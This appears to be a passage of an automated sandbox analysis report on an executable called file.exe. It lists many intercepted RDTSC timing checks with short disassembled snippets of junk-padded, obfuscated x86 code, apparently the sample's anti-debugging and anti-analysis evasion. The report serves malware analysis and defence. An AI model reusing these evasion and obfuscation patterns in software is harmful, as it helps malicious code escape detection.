              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9C4F second address: 7D9C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD65 second address: 7DAD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD6B second address: 7DAD6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD6F second address: 7DAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF489 second address: 7DF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF8EB second address: 7DF8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFB97 second address: 7DFB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFB9C second address: 7DFBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF64DC8965h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFBB8 second address: 7DFC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF64E55825h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jc 00007FBF64E55816h 0x00000014 jmp 00007FBF64E55823h 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FBF64E55825h 0x00000022 popad 0x00000023 jnc 00007FBF64E55818h 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f jne 00007FBF64E55816h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFC1B second address: 7DFC21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0413 second address: 7E0417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0497 second address: 7E04AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E04AD second address: 7E04B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E04B2 second address: 7E0507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 6ADB17C7h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBF64DC8958h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor di, A0F1h 0x0000002d call 00007FBF64DC8959h 0x00000032 push eax 0x00000033 push edx 0x00000034 push ebx 0x00000035 jmp 00007FBF64DC8962h 0x0000003a pop ebx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0507 second address: 7E0524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64E55829h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0524 second address: 7E0535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF64DC8956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0535 second address: 7E053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E053E second address: 7E0591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jng 00007FBF64DC8975h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007FBF64DC8968h 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FBF64DC8956h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0591 second address: 7E0595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1324 second address: 7E132A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1682 second address: 7E1693 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64E55816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1693 second address: 7E16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FBF64DC896Dh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBF64DC8958h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBF64DC895Ch 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2DAB second address: 7E2DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBF64E55816h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4A84 second address: 7E4A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8962h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4A9A second address: 7E4B33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FBF64E55818h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007FBF64E55820h 0x0000002a push 00000000h 0x0000002c and edi, dword ptr [ebp+122D3987h] 0x00000032 call 00007FBF64E55826h 0x00000037 mov dword ptr [ebp+122D339Dh], ebx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 and esi, dword ptr [ebp+122D387Fh] 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FBF64E55827h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FBF64E5581Dh 0x00000055 jc 00007FBF64E55816h 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5668 second address: 7E56CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D34E0h], esi 0x00000011 push 00000000h 0x00000013 mov edi, 1F0AF264h 0x00000018 or dword ptr [ebp+122D1887h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FBF64DC8958h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a xor dword ptr [ebp+122D192Eh], edx 0x00000040 sub dword ptr [ebp+12450CB8h], ebx 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FBF64DC8962h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E56CD second address: 7E56EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF64E5581Ch 0x00000008 jbe 00007FBF64E55816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007FBF64E5581Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7FD6 second address: 7E806C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF64DC8961h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FBF64DC8958h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov edi, 65590618h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FBF64DC8958h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c xchg eax, ebx 0x0000004d jmp 00007FBF64DC8963h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 pop eax 0x00000058 jmp 00007FBF64DC8968h 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E886F second address: 7E8874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC02 second address: 7EFC1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8965h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC1B second address: 7EFC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64E55825h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC34 second address: 7EFC38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0C9C second address: 7F0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0CA1 second address: 7F0CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8963h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0CB8 second address: 7F0CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0CBC second address: 7F0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb di, 2C06h 0x0000000e push 00000000h 0x00000010 jg 00007FBF64DC8956h 0x00000016 sub dword ptr [ebp+124558EDh], edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FBF64DC8958h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 xchg eax, esi 0x00000039 jnc 00007FBF64DC8964h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1C5D second address: 7F1C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64E55826h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jno 00007FBF64E55816h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FBF64E55816h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0E67 second address: 7F0E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FBF64DC8969h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1C89 second address: 7F1CF8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64E55816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov bx, di 0x0000000f mov bx, 4C94h 0x00000013 push 00000000h 0x00000015 mov bx, cx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBF64E55818h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+1245E181h], edx 0x0000003a xchg eax, esi 0x0000003b jng 00007FBF64E5581Eh 0x00000041 push edx 0x00000042 jg 00007FBF64E55816h 0x00000048 pop edx 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FBF64E55828h 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0F54 second address: 7F0F5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBF64DC8956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2EC2 second address: 7F2EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2EC7 second address: 7F2F2A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF64DC8958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+1245CC2Ah] 0x00000011 mov bx, si 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, dword ptr [ebp+124775CCh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FBF64DC8958h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D03CDh] 0x00000048 mov edi, edx 0x0000004a push FFFFFFFFh 0x0000004c jng 00007FBF64DC895Ch 0x00000052 sub dword ptr [ebp+122D2A5Eh], esi 0x00000058 nop 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2F2A second address: 7F2F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF64E5581Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5EE2 second address: 7F5EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF64DC8969h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5EFF second address: 7F5F16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FBF64E5581Ah 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F16 second address: 7F5F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F1B second address: 7F5F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FBF64E55826h 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D1F1Fh], ecx 0x00000015 push 00000000h 0x00000017 clc 0x00000018 jmp 00007FBF64E5581Bh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jnl 00007FBF64E55816h 0x00000027 pop ebx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F5A second address: 7F5F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBF64DC8956h 0x00000009 jmp 00007FBF64DC895Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jmp 00007FBF64DC895Fh 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6F0D second address: 7F6F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF64E55829h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6203 second address: 7F6208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8006 second address: 7F800A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F91D7 second address: 7F91F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FBF651395A0h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F91F4 second address: 7F91F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F91F8 second address: 7F9202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7050 second address: 7F7054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F824B second address: 7F824F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F824F second address: 7F8259 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65139DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7054 second address: 7F705A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F705A second address: 7F7070 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65139DACh 0x00000008 jnp 00007FBF65139DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9385 second address: 7F9389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB568 second address: 7FB56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB56C second address: 7FB582 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FBF6513959Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB582 second address: 7FB586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB82F second address: 7FB835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB835 second address: 7FB839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB839 second address: 7FB858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB858 second address: 7FB85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB85E second address: 7FB867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD6A1 second address: 7FD6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC88A second address: 7FC899 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC899 second address: 7FC8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC8A6 second address: 7FC8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513959Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC8B6 second address: 7FC931 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FBF65139DA8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007FBF65139DADh 0x00000028 mov dword ptr [ebp+122D17CDh], ecx 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D1983h], edi 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov eax, dword ptr [ebp+122D038Dh] 0x00000048 mov dword ptr [ebp+122D1BD1h], ecx 0x0000004e push FFFFFFFFh 0x00000050 cld 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007FBF65139DB4h 0x0000005c popad 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC931 second address: 7FC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC937 second address: 7FC93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
